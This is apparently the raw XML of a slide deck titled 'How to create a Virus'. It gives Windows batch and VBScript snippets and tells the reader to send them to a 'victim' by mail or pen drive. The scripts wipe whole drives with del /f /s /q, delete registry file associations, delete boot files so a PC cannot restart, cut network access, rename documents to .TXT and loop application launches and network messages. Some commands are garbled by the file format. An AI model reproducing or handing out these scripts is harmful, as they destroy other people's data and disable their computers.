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create a Virus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88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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Temporarily Flood Network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:CRASH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>net send * WORKGROUP ENABLED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>net send * WORKGROUP ENABLED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>GOTO CRASH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7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create virus using notepad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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy/paste all the code in notepad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save the file with extension .bat (like seofreetips.bat)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send it to the victim by mail or by Pen Drive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the victim will click on it, it will start working.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can also check these codes on your own PC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I have personally checked all of these codes in my Microsoft Surface Pro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These codes only work in Windows.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2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1. Create Fake Windows Errors With Notepad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Notepad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>X=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Msgbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>(“Message Here”,0+16,”Title Here”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Message Here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Title Here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Error Message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Error-Window Title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> respectively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save the file with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>error.vbs.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (In Save as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>filetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, must select “all”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, click the file and you’ll get your custom-made Windows error message. So its easy to learn how to create a virus using notepad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3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2. How to stop someone’s internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>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@Echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>off</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /release</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Save that as a .bat and send it to someone. They’re IP address will be lost, and therefore they won’t be able to fix it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However, this is VERY easy to fix. Simply type in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /renew</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39733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Dangerous Notepad Virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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91991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Just open your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>NOW TYPE THE FOLLOWING CODE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>@echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>off</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>del D:*.* /f /s /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>q</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>del E:*.* /f /s /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>q</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>del F:*.* /f /s /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>q</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then save it as SEO.bat and the batch file is created.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WARNING:: This is the most dangerous virus! Be careful with its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1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4. Delete the entire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>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@ECHO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OFF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>START </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delete HKCR/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>START </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delete HKCR/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>START </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delete HKCR/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now save it as SEO.bat and the batch file is created.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90457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5. Crash PC forever with Notepad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Virus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1200" dirty="0"/>
              <a:t>@echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>off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 err="1"/>
              <a:t>attrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> -r -s -h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>c:autoexec.bat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del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>c:autoexec.bat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 err="1"/>
              <a:t>attrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> -r -s -h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>c:boot.ini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del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>c:boot.ini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 err="1"/>
              <a:t>attrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> -r -s -h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>c:ntldr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del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>c:ntldr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 err="1"/>
              <a:t>attrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> -r -s -h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>c:windowswin.ini</a:t>
            </a:r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del c:windowswin.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>up notepad and copy and paste that. Save it as a .bat file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>should shut down the person’s computer. It shuts it off once and deletes the files needed to reboot and restart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r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REMEMBER — DO NOT CLICK THIS FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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534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6. Application Bomber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You can also add the application of your choice in the above code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>@echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>off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start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>winword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start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>mspaint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start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>notepad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start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>write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start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd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start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>explorer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start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>control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/>
              <a:t>start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>calc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 err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381148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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Change Files To Non-working TXT Files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REN *.DOC *.TXT REN *.JPEG *.TXT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>REN *.LNK *.TXT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>REN *.AVI *.TXT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>REN *.MPEG *.TXT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>REN *.COM *.TXT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>REN *.BAT *.TXT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Save it as bat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65200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33</TotalTime>
  <Words>471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How to create a Virus</vt:lpstr>
      <vt:lpstr>How to create virus using notepad</vt:lpstr>
      <vt:lpstr>1. Create Fake Windows Errors With Notepad </vt:lpstr>
      <vt:lpstr>2. How to stop someone’s internet access</vt:lpstr>
      <vt:lpstr>3. Dangerous Notepad Virus Code</vt:lpstr>
      <vt:lpstr>4. Delete the entire registry</vt:lpstr>
      <vt:lpstr>5. Crash PC forever with Notepad Virus</vt:lpstr>
      <vt:lpstr>6. Application Bomber </vt:lpstr>
      <vt:lpstr>7. Change Files To Non-working TXT Files </vt:lpstr>
      <vt:lpstr>8. Temporarily Flood Network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create a Virus</dc:title>
  <dc:creator>Maram Bani Younes</dc:creator>
  <cp:lastModifiedBy>Maram Bani Younes</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-05T18:56:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-05T19:29:34Z</dcterms:modified>
</cp:coreProperties>
</file>